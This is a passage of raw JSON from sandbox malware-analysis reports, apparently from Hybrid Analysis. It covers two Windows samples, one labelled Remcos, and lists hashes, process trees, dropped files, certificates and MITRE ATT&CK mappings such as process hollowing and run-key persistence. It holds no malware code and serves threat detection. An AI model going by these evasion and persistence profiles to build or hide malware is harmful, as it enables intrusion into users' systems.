\"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\WMR\"; Key: \"DISABLE\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"LoadResource with parameter {'hModule': '9830400', 'hResInfo': '10318168'}\" (UID: 00000000-00004928)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"FindResourceA\" with parameter \"10275956\" - (UID: 00000000-00004928)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \".bss\" is zero\n Raw size of \".tls\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetVersion@kernel32.dll directly followed by \"cmp al, 04h\" and \"jc 005B298Dh\" at 64751-24402-005B276C\n Found API call GetVersion@kernel32.dll directly followed by \"cmp byte ptr [00684C14h], 00h\" and \"je 0040EABEh\" at 64751-14504-0040EA40", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004928)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004928)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-152", "type": 6, "relevance": 3, "name": "Calls an API typically used to enumerate active windows", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"EnumWindows\" with parameter \"0\" - (UID: 00000000-00004928)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"IsWow64Process\" with parameter \"4928\" - (UID: 00000000-00004928)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "static-92", "relevance": 5, "name": "PE file has unusual entropy resources", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has resource with unusual entropy \"RT_RCDATA:7.89161709977\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has resource with unusual entropy \"RT_RCDATA:7.89925043569\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has resource with unusual entropy \"RT_RCDATA:7.88971352665\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has resource with unusual entropy \"RT_RCDATA:7.88725973547\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has resource with unusual entropy \"RT_RCDATA:7.88442980789\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has resource with unusual entropy \"RT_RCDATA:7.87459930481\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has resource with unusual entropy \"RT_RCDATA:7.88589013531\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has resource with unusual entropy \"RT_RCDATA:7.88975140661\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has resource with unusual entropy \"RT_RCDATA:7.88942514766\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has resource with unusual entropy \"RT_RCDATA:7.88308257749\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has resource with unusual entropy \"RT_RCDATA:7.89640521155\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has resource with unusual entropy \"RT_RCDATA:7.89331992725\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has resource with unusual entropy \"RT_RCDATA:7.88544937053\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has resource with unusual entropy \"RT_RCDATA:7.89033247058\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has resource with unusual entropy \"RT_RCDATA:7.8928861643\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has resource with unusual entropy \"RT_RCDATA:7.89259132879\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has resource with unusual entropy \"RT_RCDATA:7.9313867848\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has resource with unusual entropy \"RT_RCDATA:7.90720668449\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has resource with unusual entropy \"RT_RCDATA:7.89202846301\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"GetLogicalProcessorInformation\" (Source: 66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517, API is part of module: KERNELBASE.DLL)\n Found string \"GetThreadPreferredUILanguages\" (Source: 66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517, API is part of module: KERNELBASE.DLL)\n Found string \"SetThreadPreferredUILanguages\" (Source: 66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517, API is part of module: KERNEL32.DLL)\n Found string \"GetThreadUILanguage\" (Source: 66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517, API is part of module: KERNELBASE.DLL)\n Found string \"GetLongPathNameW\" (Source: 66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517, API is part of module: KERNELBASE.DLL)\n Found string \"VariantChangeTypeEx\" (Source: 66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517, API is part of module: OLEAUT32.DLL)\n Found string \"VarNeg\" (Source: 66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517, API is part of module: OLEAUT32.DLL)\n Found string \"VarNot\" (Source: 66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517, API is part of module: OLEAUT32.DLL)\n Found string \"VarAdd\" (Source: 66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517, API is part of module: OLEAUT32.DLL)\n Found string \"VarSub\" (Source: 66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517, API is part of module: OLEAUT32.DLL)\n Found string \"VarMul\" (Source: 66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517, API is part of module: OLEAUT32.DLL)\n Found string \"VarDiv\" (Source: 66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517, API is part of module: OLEAUT32.DLL)\n Found string \"VarIdiv\" (Source: 66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517, API is part of module: OLEAUT32.DLL)\n Found string \"VarMod\" (Source: 66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517, API is part of module: OLEAUT32.DLL)\n Found string \"VarAnd\" (Source: 66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517, API is part of module: OLEAUT32.DLL)\n Found string \"VarOr\" (Source: 66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517, API is part of module: OLEAUT32.DLL)\n Found string \"VarXor\" (Source: 66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517, API is part of module: OLEAUT32.DLL)\n Found string \"VarCmp\" (Source: 66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517, API is part of module: OLEAUT32.DLL)\n Found string \"VarI4FromStr\" (Source: 66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517, API is part of module: OLEAUT32.DLL)\n Found string \"VarR4FromStr\" (Source: 66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517, API is part of module: OLEAUT32.DLL)\n Found string \"VarR8FromStr\" (Source: 66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517, API is part of module: OLEAUT32.DLL)\n Found string \"VarDateFromStr\" (Source: 66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517, API is part of module: OLEAUT32.DLL)\n Found string \"VarCyFromStr\" (Source: 66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517, API is part of module: OLEAUT32.DLL)\n Found string \"VarBoolFromStr\" (Source: 66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517, API is part of module: OLEAUT32.DLL)\n Found string \"VarBstrFromCy\" (Source: 66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517, API is part of module: OLEAUT32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-60", "relevance": 10, "name": "PE file contains unusual section name", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has a section named \".itext\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has a section named \".didata\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has section name .text with entropy \"6.51216016659\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has section name .itext with entropy \"7.94753205283\"\n \"66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517\" has section name .reloc with entropy \"6.72340449707\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-412", "type": 9, "relevance": 5, "name": "Spawned process connects to a network", "description": "Process \"C:\\66bc909510335bfc70704e47b4d8e23119a39582ea10862477263d53b8f64517.exe\" connects to <IPv4> on port 55377 (TCP)", "origin": "Monitored Target", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-7", "type": 7, "relevance": 7, "name": "Uses network protocols on unusual ports", "description": "TCP traffic to <IPv4> on port 55377", "origin": "Network Traffic", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4
https://hybrid-analysis.com/sample/02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4
Hybrid Analysis - Remcos
{"size": 593326, "type": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "submit_name": "02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4", "sha256": "02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4", "av_detect": 80, "vx_family": "IL:Trojan.MSILZilla", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates": [{"owner": "CN=DigiCert Assured ID Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US", "issuer": "CN=DigiCert Assured ID Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US", "serial_number": "ce7e0e517d846fe8fe560fc1bf03039", "md5": "87:CE:0B:7B:2A:0E:49:00:E1:58:71:9B:37:A8:93:72", "sha1": "05:63:B8:63:0D:62:D7:5A:BB:C8:AB:1E:4B:DF:B5:A8:99:B2:4D:43", "valid_from": "2006-11-10T00:00:00+00:00", "valid_until": "2031-11-10T00:00:00+00:00"}, {"owner": "CN=DigiCert SHA2 Assured ID Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US", "issuer": "CN=DigiCert Assured ID Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US", "serial_number": "409181b5fd5bb66755343b56f955008", "md5": "B6:56:37:6C:3D:2A:CE:BB:A1:88:49:D6:04:36:1B:D5", "sha1": "92:C1:58:8E:85:AF:22:01:CE:79:15:E8:53:8B:49:2F:60:5B:80:C6", "valid_from": "2013-10-22T12:00:00+00:00", "valid_until": "2028-10-22T12:00:00+00:00"}, {"owner": "CN=Mozilla Corporation, O=Mozilla Corporation, L=Mountain View, ST=California, C=US", "issuer": "CN=DigiCert SHA2 Assured ID Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US", "serial_number": "c5396dcb2949c70fac48ab08a07338e", "md5": "BB:54:21:B5:B5:5D:C9:AD:D6:6A:61:F2:29:77:71:9D", "sha1": "B6:B2:4A:EA:9E:98:3E:D6:BD:A9:58:6A:14:5A:7D:DD:7E:22:01:96", "valid_from": "2017-06-23T00:00:00+00:00", "valid_until": "2019-06-28T12:00:00+00:00"}, {"owner": "CN=Symantec Time Stamping Services Signer - G4, O=Symantec Corporation, C=US", "issuer": "CN=Symantec Time Stamping Services CA - G2, O=Symantec Corporation, C=US", "serial_number": "ecff438c8febf356e04d86a981b1a50", "md5": "08:32:B6:5C:C3:E3:A4:9B:C3:81:BA:95:E1:B5:87:37", "sha1": "65:43:99:29:B6:79:73:EB:19:2D:6F:F2:43:E6:76:7A:DF:08:34:E4", "valid_from": "2012-10-18T00:00:00+00:00", "valid_until": "2020-12-29T23:59:59+00:00"}, {"owner": "CN=Symantec Time Stamping Services CA - G2, O=Symantec Corporation, C=US", "issuer": "CN=Thawte Timestamping CA, OU=Thawte Certification, O=Thawte, L=Durbanville, ST=Western Cape, C=ZA", "serial_number": "7e93ebfb7cc64e59ea4b9a77d406fc3b", "md5": "7B:A3:69:EE:9A:BD:81:E0:FC:76:74:E9:70:9E:15:1D", "sha1": "6C:07:45:3F:FD:DA:08:B8:37:07:C0:9B:82:FB:3D:15:F3:53:36:B1", "valid_from": "2012-12-21T00:00:00+00:00", "valid_until": "2020-12-30T23:59:59+00:00"}], "certificates_validation_message": "The operation completed successfully. (0x0)", "total_processes": 4, "total_signatures": 148, "extracted_files": [{"name": "Webfrequency.exe", "file_path": "%APPDATA%\\Webdevelop\\Webfrequency.exe", "file_size": 593390, "sha256": "a5c1dcce1bd4157167dc864ab2cce65902bf51fc3c8da3b839011916940d70d0", "type_tags": ["peexe", "assembly", "executable"], "description": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "runtime_process": "02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe (PID: 2568)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "network.dat", "file_size": 7870, "sha256": "c7c81222b11ef9a7b238c3eb371d20714bc28f2d40ba9a7af19e0b06b2bbaac5", "type_tags": ["data"], "description": "data", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "system.dat", "file_size": 4750, "sha256": "3f161029fc61292fa3f7f27701158fc9b13d2c631ed7214a7103ef497ddd6c4c", "type_tags": ["data"], "description": "data", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "10-02-2025", "file_size": 93, "sha256": "65d2cb5cf01eb072630ee2990874c0bfb23b320914ad70b555ac0ab996895ab9", "type_tags": ["data"], "description": "data", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "11-02-2025", "file_size": 12, "sha256": "221d8c2e96121ad59cc30cc10391f33b0c32dde8dd1ad75defedeac1af6deb28", "type_tags": ["text"], "description": "Non-ISO extended-ASCII text, with no line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Webfrequency.exe.bin", "file_size": 593390, "sha256": "a5c1dcce1bd4157167dc864ab2cce65902bf51fc3c8da3b839011916940d70d0", "type_tags": ["peexe", "assembly", "executable"], "description": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00002568", "name": "02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe", "normalized_path": "C:\\02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4.exe", "sha256": "02968e873dd1ae2851fdf893a4dd3c745e93b3ed9bd716e02b65316c8f148ec4", "av_label": "IL:Trojan.MSILZilla", "av_matched": 11, "av_total": 22}, {"uid": "00000000-00001812", "parentuid": "00000000-00002568", "name": "Webfrequency.exe", "normalized_path": "%APPDATA%\\Webdevelop\\Webfrequency.exe", "sha256": "a5c1dcce1bd4157167dc864ab2cce65902bf51fc3c8da3b839011916940d70d0"}, {"uid": "00000000-00000352", "parentuid": "00000000-00001812", "name": "RegAsm.exe", "normalized_path": "%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", "sha256": "d2f0b87e2d2707685c4d35f8f05b42fb8326ef4e70d16097b8837daba06ac961"}, {"uid": "00000000-00004536", "name": "Webfrequency.exe", "normalized_path": "%APPDATA%\\Webdevelop\\Webfrequency.exe", "sha256": "a5c1dcce1bd4157167dc864ab2cce65902bf51fc3c8da3b839011916940d70d0"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 1, "informative_identifiers_count": 7}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 3, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Boot or 